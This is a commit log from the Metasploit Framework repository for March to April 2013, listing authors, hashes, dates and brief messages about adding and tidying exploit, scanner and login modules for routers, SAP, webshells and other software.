fix DEPTH description and basename
2013-04-05 11:02:59 +02:00
James Lee
ad46b46684
Landing #1463 , Meatballs' cdecl fixes
2013-04-04 22:58:59 -05:00
jvazquez-r7
d823f724cd
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-04 22:16:35 +02:00
jvazquez-r7
30f44c3a24
final cleanup for dlink_dir_615h_http_login
2013-04-04 22:02:45 +02:00
jvazquez-r7
8f60d12e46
Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_login_dir_615H
2013-04-04 22:01:49 +02:00
jvazquez-r7
b75d038fc2
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-04 21:54:36 +02:00
jvazquez-r7
7d1e9af728
final cleanup for dlink_dir_session_cgi_http_login
2013-04-04 21:41:42 +02:00
jvazquez-r7
0b9fe53919
module filename changed
2013-04-04 21:41:10 +02:00
jvazquez-r7
6ec6638568
Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
2013-04-04 21:40:21 +02:00
jvazquez-r7
498a0dc309
final cleanup for dlink_dir_300_615_http_login
2013-04-04 21:15:22 +02:00
jvazquez-r7
cff70e41be
Merge branch 'dlink_login' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink_login
2013-04-04 21:14:56 +02:00
m-1-k-3
96b444c79e
ManualRanking
2013-04-04 17:40:53 +02:00
m-1-k-3
67f0b1b6ee
little cleanump
2013-04-04 17:33:46 +02:00
m-1-k-3
f07117fe7d
replacement of wrt54gl auxiliary module - initial commit
2013-04-04 17:30:36 +02:00
HD Moore
fe2b598503
Add the advisory URL
2013-04-04 10:22:31 -05:00
HD Moore
c8a6dfbda2
Add scanner module for the new PostgreSQL flaw
2013-04-04 10:19:47 -05:00
m-1-k-3
7b4cdf4671
make msftidy happy
2013-04-04 13:22:01 +02:00
m-1-k-3
78c492da20
is_dlink, more feedback included, msftidy
2013-04-04 13:18:32 +02:00
m-1-k-3
2f96a673cd
is_dlink, more feedback included
2013-04-04 13:17:45 +02:00
m-1-k-3
64f3e68310
is_dlink and some more feedback included
2013-04-04 13:01:18 +02:00
jvazquez-r7
358c43f6f6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-03 19:17:53 +02:00
Tod Beardsley
e4d901d12c
Space at EOL (msftidy)
2013-04-03 09:20:01 -05:00
jvazquez-r7
08b96f0186
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-03 15:39:30 +02:00
agix
b947dc71e9
english :) "must be"
2013-04-03 13:47:57 +02:00
agix
60dfece55c
add opcode description
2013-04-03 13:46:56 +02:00
jvazquez-r7
ce88d8473a
cleanup for netgear_dgn1000b_setup_exec
2013-04-03 12:44:04 +02:00
jvazquez-r7
3c27678168
Merge branch 'netgear-dgn1000b-exec-exploit' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-netgear-dgn1000b-exec-exploit
2013-04-03 12:43:42 +02:00
m-1-k-3
a93ec3aea3
fix name
2013-04-03 10:40:52 +02:00
m-1-k-3
2ceecabede
make msftidy happy
2013-04-03 10:34:28 +02:00
m-1-k-3
91b0e5f800
netgear dgn2200b pppoe exec exploit - initial commit
2013-04-03 10:32:52 +02:00
jvazquez-r7
89de9fdf22
cleanup for dlink_dir_300_615_http_login
2013-04-03 10:04:01 +02:00
jvazquez-r7
b4b3c82c86
delete space
2013-04-03 00:31:00 +02:00
jvazquez-r7
54120a2d3a
delete space
2013-04-03 00:30:24 +02:00
jvazquez-r7
85d9e3e9ee
delete space
2013-04-03 00:29:38 +02:00
jvazquez-r7
0b4eab2499
added module for ZDI-13-053
2013-04-03 00:24:11 +02:00
jvazquez-r7
018e147063
added module for ZDI-13-052
2013-04-03 00:22:38 +02:00
jvazquez-r7
dc17b4931c
added module for ZDI-13-051
2013-04-03 00:21:01 +02:00
m-1-k-3
642d8b846f
netgear_dgn1000b_setup_exec - initial commit
2013-04-02 14:41:50 +02:00
m-1-k-3
7f3c6f7629
netgear_dgn1000b_setup_exec - initial commit
2013-04-02 14:39:04 +02:00
m-1-k-3
1b27d39591
netgear dgn1000b mipsbe exploit
2013-04-02 14:34:09 +02:00
agix
7359151c14
decrement esp to fix crash in the middle of shellcode
2013-04-02 13:25:31 +02:00
jvazquez-r7
8e3d1c7c47
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-02 11:17:22 +02:00
jvazquez-r7
6a6fa5b39e
module filename changed
2013-04-02 10:50:50 +02:00
jvazquez-r7
b3feb51c49
cleanup for linksys_e1500_up_exec
2013-04-02 10:49:09 +02:00
jvazquez-r7
5e42b8472b
Merge branch 'linksys_e1500_exploit' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-linksys_e1500_exploit
2013-04-02 10:48:28 +02:00
m-1-k-3
579c499f43
Juans SRVHOST check included
2013-04-02 07:50:51 +02:00
jvazquez-r7
2936d3cfb1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-04-01 21:50:29 +02:00
jvazquez-r7
08ba2c70d3
update title and descr for mongod_native_helper
2013-04-01 21:44:08 +02:00
jvazquez-r7
81bca2c45a
cleanup for mongod_native_helper
2013-04-01 21:35:34 +02:00
m-1-k-3
c386d54445
check SRVHOST
2013-04-01 18:12:13 +02:00
agix
cc598bf977
Resolv a problem with mmap64 libc function and its unknown last argument
2013-04-01 17:38:09 +02:00
agix
6b639ad2ee
add memcpy to the ropchain due to the zeroed mmap function under ubuntu
2013-04-01 14:13:19 +02:00
Tod Beardsley
cd4a410682
Forgot an end. Dangit.
2013-03-31 23:24:50 -05:00
Tod Beardsley
ac858c81a5
Deal with other osql banners and responses
...
Not sure where those other banners come from, but keeping them as
positive responses regardless.
[FixRM #7862 ]
2013-03-31 23:20:05 -05:00
agix
baf1ce22b3
increase mmap RWX size
2013-03-31 21:04:39 +02:00
jvazquez-r7
070fd399f2
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-31 20:23:08 +02:00
sinn3r
6b896933dd
Merge branch 'fix_author_details' of github.com:m-1-k-3/metasploit-framework into m-1-k-3-fix_author_details
2013-03-31 13:14:47 -05:00
jvazquez-r7
0f965ddaa3
waiting for payload download on linksys_e1500_more_work
2013-03-31 16:07:14 +02:00
agix
30111e3d8b
hpsmh smhstart local exploit BOF
2013-03-31 13:04:34 +02:00
jvazquez-r7
315abd8839
fix Privileged field
2013-03-30 19:39:01 +01:00
jvazquez-r7
a46805d95d
description updated
2013-03-30 19:36:35 +01:00
jvazquez-r7
c880a63e75
Added module for ZDI-13-049
2013-03-30 19:35:04 +01:00
jvazquez-r7
b43745fc83
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-30 15:33:52 +01:00
m-1-k-3
587170ae52
fixed author details - next try
2013-03-30 12:43:55 +01:00
m-1-k-3
1d6184cd63
fixed author details
2013-03-30 12:41:31 +01:00
m-1-k-3
cd8bc2f87d
description, blind exploitation info on cmd payload
2013-03-30 12:03:14 +01:00
m-1-k-3
b0a61adc23
juans feedback included
2013-03-30 11:43:10 +01:00
jvazquez-r7
5fd996f775
added osvdb reference
2013-03-30 10:42:58 +01:00
jvazquez-r7
3bf0046e3e
Merge branch 'hp_system_management' of https://github.com/agix/metasploit-framework into agix-hp_system_management
2013-03-30 10:42:06 +01:00
m-1-k-3
7965f54890
juans feedback included
2013-03-30 08:40:42 +01:00
Borja Merino
d08640726b
added post module forensics recovery files
2013-03-30 01:59:41 +01:00
jvazquez-r7
607b1c5c14
little cleanup for e1500_up_exec
2013-03-29 23:16:13 +01:00
m-1-k-3
1b563ad915
stop_service
2013-03-29 22:38:06 +01:00
m-1-k-3
813ff1e61e
removed payload stuff
2013-03-29 22:32:57 +01:00
m-1-k-3
8032a33cd5
report_auth_info - proof
2013-03-29 22:06:25 +01:00
m-1-k-3
1156194a6b
feedback included, server fingerprinting
2013-03-29 22:04:22 +01:00
jvazquez-r7
224188ddf6
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-29 21:49:40 +01:00
m-1-k-3
2b4d6eb455
feedback included, server header check
2013-03-29 21:30:45 +01:00
m-1-k-3
b6a50da394
feedback included, server header check
2013-03-29 21:20:51 +01:00
m-1-k-3
c5e358c9c3
compatible payloads
2013-03-29 20:54:35 +01:00
jvazquez-r7
714fc83cfe
Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into bwall-Ra1NX_pubcall
2013-03-29 19:58:06 +01:00
m-1-k-3
0164cc34be
msftidy, generate exe, register_file_for_cleanup
2013-03-29 19:00:04 +01:00
bwall
21ea1c9ed4
Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall
2013-03-29 13:29:38 -04:00
bwall
10d9e86b42
Renamed file to be all lower case
2013-03-29 13:29:05 -04:00
jvazquez-r7
c55a3870a8
cleanup for hp_system_management
2013-03-29 18:02:23 +01:00
m-1-k-3
cfeddf3f34
cmd payload working, most feedback included
2013-03-29 14:43:48 +01:00
jvazquez-r7
cd1820d769
trying to solve irc comm issues
2013-03-29 12:54:57 +01:00
jvazquez-r7
5616b8245b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-29 11:59:33 +01:00
bwall
6cf44d9c85
added a 3 message window for recieving the check response
2013-03-28 21:14:52 -04:00
James Lee
9086c53751
Not an HttpClient, so doesn't have normalize_uri
...
[FixRM #7851 ]
2013-03-28 13:16:21 -05:00
nmonkee
5b30115336
vprint_status changed to vprint_error as requested
2013-03-28 14:27:51 +00:00
nmonkee
0f147dcf47
vprint_status changed to vprint_error as requested
2013-03-28 14:24:57 +00:00
nmonkee
eee702a329
vprint_status changed to vprint_error as requested
2013-03-28 14:23:21 +00:00
nmonkee
e2212ca8c9
vprint_status changed to vprint_error as requested
2013-03-28 14:22:01 +00:00
jvazquez-r7
e9842eac2e
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-28 15:18:41 +01:00
nmonkee
9594693ecb
vprint_status changed to vprint_error as requested
2013-03-28 14:16:19 +00:00
jvazquez-r7
29ad9939e1
cleanup for stunshell_eval
2013-03-28 15:11:20 +01:00
jvazquez-r7
514aed404c
Merge branch 'STUNSHELL_eval' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_eval
2013-03-28 15:10:57 +01:00
nmonkee
9d87db6831
vprint_status changed to vprint_error as requested
2013-03-28 14:08:24 +00:00
jvazquez-r7
3ffbc5e5b3
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-28 14:58:43 +01:00
jvazquez-r7
9b18eb858b
cleanup for stunshell_exec
2013-03-28 14:45:51 +01:00
jvazquez-r7
a7a5569725
Merge branch 'STUNSHELL_exec' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_exec
2013-03-28 14:45:28 +01:00
agix
4a683ec9a4
Fix msftidy WARNING
2013-03-28 13:36:35 +01:00
agix
139926a25b
Fix msftidy Warning
2013-03-28 13:22:26 +01:00
jvazquez-r7
6cd6a7d6b9
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-28 12:16:18 +01:00
agix
eec386de60
fail in git usage... sorry
2013-03-28 12:05:49 +01:00
agix
4bcadaabc1
hp system management homepage DataValidation?iprange buffer overflow
2013-03-28 12:00:17 +01:00
nmonkee
aae1d5933e
removed socket print, left over from debugging
2013-03-28 10:49:23 +00:00
nmonkee
376ca7b107
fixed issue with access denied condition thanks to @pho_bos
2013-03-28 10:41:37 +00:00
agix
69fb465293
Put gadgets in Target
2013-03-28 11:15:13 +01:00
agix
dee5835eab
Create mongod_native_helper.rb
...
metasploit exploit module for CVE-2013-1892
2013-03-28 03:10:38 +01:00
bwall
ce9f11aeb3
Changed the targets to be more specific
2013-03-27 17:22:29 -04:00
bwall
f14d5ba8ec
Removed extra comma
2013-03-27 17:15:34 -04:00
bwall
2a60ef2d60
Renamed and fixed some code issues
2013-03-27 17:14:41 -04:00
bwall
cc92b54e83
Moved module and cleaned code
2013-03-27 17:03:18 -04:00
bwall
76fb6ff48f
Updated ranking
2013-03-27 16:41:35 -04:00
jvazquez-r7
e25a06c649
delete comma
2013-03-27 21:33:58 +01:00
jvazquez-r7
276e8f647b
Merge branch 'v0pCr3w' of https://github.com/bwall/metasploit-framework into bwall-v0pCr3w
2013-03-27 21:33:34 +01:00
jvazquez-r7
5fc5a4f429
use target_uri
2013-03-27 20:45:34 +01:00
jvazquez-r7
f29cfbf393
cleanup for v0pCr3w_exec
2013-03-27 20:38:11 +01:00
bwall
fd302d62b8
Removed testing code
2013-03-27 12:50:42 -04:00
m-1-k-3
dfd451f875
make msftidy happy
2013-03-27 17:46:02 +01:00
sinn3r
951f95db05
Merge branch 'java_cmm' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-java_cmm
2013-03-27 11:41:46 -05:00
jvazquez-r7
0109d81c95
fix typo
2013-03-27 17:39:18 +01:00
m-1-k-3
e042fd3697
first test of e1500 down and exec exploit
2013-03-27 17:09:17 +01:00
jvazquez-r7
6acc34ffcf
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-27 16:46:24 +01:00
jvazquez-r7
353f02cdcc
move word_unc_injector to gather dir
2013-03-27 16:23:19 +01:00
jvazquez-r7
ed23fe6502
Merge branch 'post-word_unc_injector.rb' of https://github.com/SphaZ/metasploit-framework into SphaZ-post-word_unc_injector.rb
2013-03-27 16:21:54 +01:00
nmonkee
507692c660
SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXECUTE Function Command Execution
2013-03-27 15:20:18 +00:00
nmonkee
8fc67b5c4e
SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
2013-03-27 15:01:46 +00:00
m-1-k-3
aa981cc991
DIR-645 also working
2013-03-27 12:11:14 +01:00
jvazquez-r7
ef11a584f4
work on word_unc_injector
2013-03-27 11:17:29 +01:00
m-1-k-3
615aa57399
Dlink DIR615 HW rev B login module
2013-03-27 09:26:23 +01:00
m-1-k-3
680b551215
default to user admin
2013-03-27 08:59:19 +01:00
m-1-k-3
032214fb1d
default to user admin
2013-03-27 08:49:04 +01:00
jvazquez-r7
c225d8244e
Added module for CVE-2013-1493
2013-03-26 22:30:18 +01:00
m-1-k-3
e1a719a6c0
http login module for DLink DIR300revB, DIR600revB, DIR815
2013-03-26 20:57:24 +01:00
m-1-k-3
c4fe21865c
user fix
2013-03-26 20:15:19 +01:00
nmonkee
f16c8094f9
Rex::Text.rand_text_alphanumeric for file name
2013-03-26 13:53:16 +00:00
nmonkee
ff7096782f
SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection
2013-03-26 12:16:50 +00:00
jvazquez-r7
787f8cc32f
up to date
2013-03-26 12:18:53 +01:00
jvazquez-r7
1d95abc458
cleanup for joomla_comjce_imgmanager
2013-03-26 12:02:39 +01:00
jvazquez-r7
9b3bbd577f
module moved to unix webapps
2013-03-26 12:02:08 +01:00
jvazquez-r7
c4fcf85af2
Merge branch 'heyder-joomla' of https://github.com/heyder/metasploit-framework into heyder-heyder-joomla
2013-03-26 12:01:46 +01:00
jvazquez-r7
6f5fc77019
up to date
2013-03-26 11:59:41 +01:00
jvazquez-r7
2d0a813aa6
Merge branch 'heyder-joomla' of https://github.com/heyder/metasploit-framework
2013-03-26 11:23:33 +01:00
bwall
a5346240de
Updated v0pCr3w_exec to use send_request_cgi
2013-03-26 01:33:30 -04:00
heyder
014c01099e
improve cleanup
2013-03-26 02:22:10 -03:00
nmonkee
bcc26427c0
EPS_GET_DIRECTORY_LISTING (List Directory abd SMB Relay)
2013-03-25 20:26:56 +00:00
nmonkee
d8086a27a6
vprint_status mod
2013-03-25 20:20:29 +00:00
nmonkee
121c75f646
vprint_status mod
2013-03-25 20:18:14 +00:00
nmonkee
da6a99defb
vprint_status mod
2013-03-25 20:16:11 +00:00
nmonkee
f66ffbfa81
vprint_status mod
2013-03-25 20:13:45 +00:00
nmonkee
95e7d55313
remove sap_soap_rfc_eps_delete_file_smb_relay.rb
2013-03-25 20:09:59 +00:00
nmonkee
f7ccfa634e
This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service
2013-03-25 19:59:16 +00:00
jvazquez-r7
3c12459703
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-25 19:33:36 +01:00
jvazquez-r7
9717a8c3b4
cleanup for tplink_traversal_noauth
2013-03-25 19:20:18 +01:00
jvazquez-r7
543b401a55
Merge branch 'tplink-traversal' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-tplink-traversal
2013-03-25 19:18:53 +01:00
jvazquez-r7
393d5d8bf5
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-25 19:09:42 +01:00
nmonkee
f92f59bfad
EPS_DELETE_FILE (File deletion and SMB Relay)
2013-03-25 17:23:27 +00:00
sinn3r
dcce23d23d
Merge branch 'bugs/tomcat_enum-double_check' of github.com:neinwechter/metasploit-framework into neinwechter-bugs/tomcat_enum-double_check
2013-03-25 12:19:52 -05:00
nmonkee
01ee30e389
PFL_CHECK_OS_FILE_EXISTENCE (file existence and SMB relay)
2013-03-25 17:11:23 +00:00
jvazquez-r7
fdd06c923a
cleanup for dlink_dir_645_password_extractor
2013-03-25 18:04:12 +01:00
jvazquez-r7
a9a5a3f64f
Merge branch 'dlink-dir645-password-extractor' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-dlink-dir645-password-extractor
2013-03-25 18:02:51 +01:00
Nathan Einwechter
aad0eed485
Fix whitespace EOL
2013-03-25 13:00:37 -04:00
nmonkee
5be98593a9
RZL_READ_DIR_LOCAL (directory listing and SMB relay)
2013-03-25 16:59:37 +00:00
Nathan Einwechter
3f79b2fd3b
Use :abort for scanner mixin
2013-03-25 12:59:18 -04:00
nmonkee
e840578ea2
SAP /sap/bw/xml/soap/xmla XMLA service (XML DOCTYPE) SMB relay
2013-03-25 16:57:12 +00:00
sinn3r
56c07211a0
Merge branch 'actfax_raw_bof' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-actfax_raw_bof
2013-03-25 11:56:15 -05:00
sinn3r
47e3d7de59
Merge branch 'bugs/RM7108-adobe_flash_mp4_cprt-add_resource_issue' of github.com:neinwechter/metasploit-framework into neinwechter-bugs/RM7108-adobe_flash_mp4_cprt-add_resource_issue
2013-03-25 11:46:37 -05:00
sinn3r
0d56da0511
Merge branch 'netgear-sph200d' of github.com:m-1-k-3/metasploit-framework into m-1-k-3-netgear-sph200d
2013-03-25 11:45:40 -05:00
sinn3r
f4c04503d2
Merge branch 'master' of github.com:rapid7/metasploit-framework
2013-03-25 11:38:08 -05:00
Nathan Einwechter
99fe2a33d7
Deregister USER_AS_PASS and stop on connect error
2013-03-25 12:35:52 -04:00
jvazquez-r7
53b862300e
cleanup for linksys_e1500_traversal
2013-03-25 17:33:38 +01:00
jvazquez-r7
ea804d433e
change file name
2013-03-25 17:33:16 +01:00
jvazquez-r7
660d3d5388
Merge branch 'linksys-traversal' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-linksys-traversal
2013-03-25 17:31:11 +01:00
jvazquez-r7
2d5a0d6916
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-25 17:08:23 +01:00
m-1-k-3
e57498190b
dlink dir 300/600 login module - initial commit
2013-03-25 08:48:24 +01:00
bwall
5218831167
Added license information and tidied up the code
2013-03-25 00:05:31 -04:00
bwall
e98a463de2
Added license information and tidied up code
2013-03-25 00:04:39 -04:00
bwall
e37fa3b40a
Added license information and tidied up code
2013-03-25 00:03:32 -04:00
bwall
6be88224bf
Added the license information and tidied up
2013-03-25 00:01:20 -04:00
heyder
0c169f94eb
correct some bad indent
2013-03-24 21:07:51 -03:00
jvazquez-r7
d54687cb37
fix typo
2013-03-25 00:58:47 +01:00
jvazquez-r7
26b43d9ed2
Added module for ZDI-13-050
2013-03-25 00:54:30 +01:00
heyder
50ac5cf247
Adjust payload size and others code adjustments
2013-03-24 20:25:29 -03:00
m-1-k-3
98ac6e8090
feedback included
2013-03-24 21:01:30 +01:00
bwall
7e0b0ac092
Added STUNSHELL webshell remote command execution module
2013-03-24 15:18:08 -04:00
bwall
b23d259485
Added STUNSHELL webshell remote code evaluation[PHP] module
2013-03-24 15:16:45 -04:00
bwall
bbcf21ee24
Added v0pCr3w webshell remote command execution module
2013-03-24 15:13:42 -04:00
bwall
ca6ab7c8c2
Added Ra1NX pubcall authentication bypass exploit module
2013-03-24 14:59:27 -04:00
m-1-k-3
d90de54891
reporting and feedback
2013-03-24 15:00:18 +01:00
m-1-k-3
9f8ec37060
store loot
2013-03-24 11:48:49 +01:00
m-1-k-3
71708c4bc3
dir 645 password extractor - initial commit
2013-03-24 11:44:24 +01:00
jvazquez-r7
49ac3ac1a3
cleanup for linksys_e1500_e2500_exec
2013-03-23 23:30:49 +01:00
jvazquez-r7
98be5d97b8
Merge branch 'linksys-e1500-e2500-exec' of https://github.com/m-1-k-3/metasploit-framework into m-1-k-3-linksys-e1500-e2500-exec
2013-03-23 23:30:14 +01:00
m-1-k-3
b2bf1df098
fixed encoding and set telnetd as default cmd
2013-03-23 22:56:15 +01:00
m-1-k-3
7ff9c70e38
10 to 0 is good :)
2013-03-23 22:46:26 +01:00
m-1-k-3
47d458a294
replacement of the netgear-sph200d module
2013-03-23 22:40:32 +01:00
m-1-k-3
bd522a03e3
replace module to the scanner directory
2013-03-23 22:29:44 +01:00
m-1-k-3
b1ae2f7bf4
replace module to the scanner directory
2013-03-23 22:29:31 +01:00
m-1-k-3
8f59999f82
replace module to the scanner directory
2013-03-23 22:25:04 +01:00
m-1-k-3
f58554bb57
replace module to the scanner directory
2013-03-23 22:24:50 +01:00
m-1-k-3
965ec34368
check of the server on the first try
2013-03-23 22:13:01 +01:00
m-1-k-3
aacd14ae45
version removed, encode params removed
2013-03-23 21:31:08 +01:00
m-1-k-3
b01959ea70
tplink traversal - initial commit
2013-03-23 20:30:32 +01:00
jvazquez-r7
cb56b2de4b
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-23 20:06:05 +01:00
m-1-k-3
36d1746c0d
linksys traversal module - initial commit
2013-03-23 17:01:02 +01:00
m-1-k-3
270f64acc2
feedback included
2013-03-23 15:54:34 +01:00
heyder
5bee1471df
many code adjustments
2013-03-22 23:07:08 -03:00
Nathan Einwechter
89c0e8c27e
Fix add_resource call in adobe_flas_mp5_cprt
2013-03-22 19:27:02 -04:00
jvazquez-r7
6eaf995642
cleaning exploiting string
2013-03-22 21:48:02 +01:00
jvazquez-r7
fd63283524
make msftidy happy
2013-03-22 21:46:12 +01:00
sinn3r
f22c18e026
Merge branch 'module-psexec_command-file_prefix' of github.com:kn0/metasploit-framework into kn0-module-psexec_command-file_prefix
2013-03-22 13:08:13 -05:00
sinn3r
11754f271a
Merge branch 'mutiny_subnetmask_exec' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mutiny_subnetmask_exec
2013-03-22 13:05:16 -05:00
sinn3r
051e31c19f
Merge branch 'kingview_kingmess_kvl' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-kingview_kingmess_kvl
2013-03-22 13:00:38 -05:00
sinn3r
dea48b459f
Merge branch 'download_exec_shell' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-download_exec_shell
2013-03-22 12:53:36 -05:00
jvazquez-r7
de7a483dab
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-22 17:54:44 +01:00
Tod Beardsley
d908050808
Merge epo_sql fix from neinwechter
...
Easy, sensible fix -- since report_auth_info uses full_user, print_good
should too.
[Closes #1629 ]
2013-03-22 11:22:24 -05:00
Nathan Einwechter
096ec9a5d7
Fix to print out correct/full username
2013-03-22 10:22:24 -04:00
heyder
b5c65ad51b
add Joomla Component JCE File Upload Code Execution
2013-03-22 10:41:35 -03:00
jvazquez-r7
bbff20fd65
cleanup for struts_code_exec_parameters
2013-03-21 22:17:47 +01:00
jvazquez-r7
50c6a98530
Merge branch 'struts-param-rce' of https://github.com/Console/metasploit-framework into Console-struts-param-rce
2013-03-21 22:17:20 +01:00
jvazquez-r7
296f2e7c2c
up to date
2013-03-21 22:10:18 +01:00
Console
cbccda10ca
fixing issue raised by @meatballs1
2013-03-21 20:58:40 +00:00
jvazquez-r7
9c1694e8a0
Merge branch 'struts-param-rce' of https://github.com/Console/metasploit-framework
2013-03-21 20:44:10 +01:00
Console
302193f98b
Various fixes and improvements
...
Chunk_length now varies according to targeturi and parameter
A few typographical inconsistences corrected
CMD option removed as its not being used
custom http request timeout removed
2013-03-21 19:03:39 +00:00
Console
8027615608
fixed comments left in by accident
2013-03-21 16:43:44 +00:00
Console
4edf5260f4
check function now tells user about delay
2013-03-21 16:40:45 +00:00
jvazquez-r7
f27333567f
use bash or sh according to availability
2013-03-21 17:26:56 +01:00
jvazquez-r7
4f0be52a0d
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-21 17:10:58 +01:00
jvazquez-r7
47ea8aea30
Merge branch 'download_exec_wget' of https://github.com/dougsko/metasploit-framework into dougsko-download_exec_wget
2013-03-21 17:09:20 +01:00
Console
a714b430ca
used normalize_uri
2013-03-21 14:05:08 +00:00
Console
5c9bec1552
commit fix branch for Console-struts-RCE
2013-03-21 13:40:16 +00:00
jvazquez-r7
370f849e29
cleanup for download_exec
2013-03-21 09:24:02 +01:00
jvazquez-r7
b30a5aa6e8
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-21 09:07:41 +01:00
Doug P
39b1ad8bd6
spacing cleanup
2013-03-21 00:21:10 -04:00
Doug P
837d426ff0
removed an extra space
2013-03-21 00:18:35 -04:00
Doug P
08029ca2e8
edited Description
2013-03-21 00:17:55 -04:00
Doug P
edd85ccd69
added wget support
2013-03-21 00:09:22 -04:00
Tod Beardsley
e149c8670b
Unconflicting ruby_string method
...
Looks like the conflict was created by the msftidy fixes that happened
over on the master branch. No big deal after all.
2013-03-20 15:49:23 -05:00
m-1-k-3
dcd2aebdcd
feedback included
2013-03-20 21:34:30 +01:00
SphaZ
804e2cfa3a
small fixup of unused old vars
2013-03-20 21:31:28 +01:00
Tod Beardsley
011b6899b0
Merge 'neinwechter/browser_autopwn-updates'
...
Brings in neinwechter's BAP fixes. Seems to not only be a more sane
strategy, but in practice, ends up with tons more shells for at least
MSIE which is what most people are using it for anyway.
[Closes #1612 ]
2013-03-20 15:26:09 -05:00
SphaZ
b275797ba2
Used msf file mixin where possible and more in memory handling
2013-03-20 21:25:07 +01:00
Tod Beardsley
e377e30873
unscrewing syntax error
2013-03-20 15:04:31 -05:00
Tod Beardsley
fd20eba35e
Expanding the title and desc for external_ip
...
Also allowing the capitalization on "via" to be small.
2013-03-20 14:42:12 -05:00
jvazquez-r7
189abdc650
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-20 19:28:16 +01:00
jvazquez-r7
cd58a6e1a1
cleanup for nagios_nrpe_arguments
2013-03-20 19:22:48 +01:00
jvazquez-r7
072fca9f6c
Merge branch 'post_linux_manage_download_exec' of https://github.com/jasbro/metasploit-framework into jasbro-post_linux_manage_download_exec
2013-03-20 18:02:51 +01:00
jvazquez-r7
54f22ed06c
check if curl is on the path
2013-03-20 17:31:48 +01:00
Joshua Abraham
9948d1ec12
change from vcmd_exec to a method in the module
2013-03-19 20:40:25 -04:00
jvazquez-r7
44f07cef19
Merge branch 'linksys-e1500-e2500-exec' of https://github.com/m-1-k-3/metasploit-framework
2013-03-20 00:47:31 +01:00
jvazquez-r7
7391bc0201
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-20 00:46:10 +01:00
jvazquez-r7
26dec4eb8f
last cleanup for sami_ftpd_list
2013-03-19 21:32:05 +01:00
jvazquez-r7
42efe5955b
Merge branch 'osvdb-90815' of https://github.com/dougsko/metasploit-framework into dougsko-osvdb-90815
2013-03-19 21:31:46 +01:00
jvazquez-r7
80d218b284
Merge branch 'master' of https://github.com/rapid7/metasploit-framework
2013-03-19 19:55:51 +01:00
jvazquez-r7
b19c51aa81
cleanup for sami_ftpd_list
2013-03-19 19:04:14 +01:00
m-1-k-3
9fc0f9a927
initial commit
2013-03-19 17:31:01 +01:00
dougsko
e2a9245b08
Changed target to Windows XP
2013-03-19 13:20:23 -03:00
sinn3r
0c0d15024a
No tabs for these
2013-03-19 08:39:47 -05:00
sinn3r
07a3f15292
Merge branch 'coolpdf_image_stream_bof' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-coolpdf_image_stream_bof
2013-03-19 08:38:30 -05:00
sinn3r
116f5b87f0
Merge branch 'axigen_file_access' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-axigen_file_access
2013-03-19 08:33:58 -05:00
Joel Parish
21e9f7dbd2
Added module for CVE-2013-1362
...
Module exploits a shell code metacharacter escaping vulnerability in
poorly configured Nagios Remote Plugin Executor installations.
2013-03-19 01:43:46 -07:00
Matt Andreko
fd5bd52e6d
Added some error handling if the connection dies.
2013-03-18 17:26:40 -04:00
Matt Andreko
66dcbca562
Sysax Multi-Server SSHD DoS
...
This exploit affects Sysax Multi-Server version 6.10. It causes a
Denial of Service by sending a specially crafted Key Exchange, which
causes the service to crash.
2013-03-18 17:16:12 -04:00
dougsko
fb90a1b497
Uses IP address length in offset calculation
2013-03-18 16:18:04 -03:00
jvazquez-r7
4aab1cc5df
delete debug code
2013-03-18 16:28:39 +01:00
jvazquez-r7
dffec1cd41
added module for cve-2012-4914
2013-03-17 21:12:40 +01:00
Doug P
3d92d6e977
removed the handler call
2013-03-15 16:48:53 -04:00
Doug P
a96283029e
made payload size a little smaller
2013-03-15 16:08:43 -04:00
Doug P
8b5c782b54
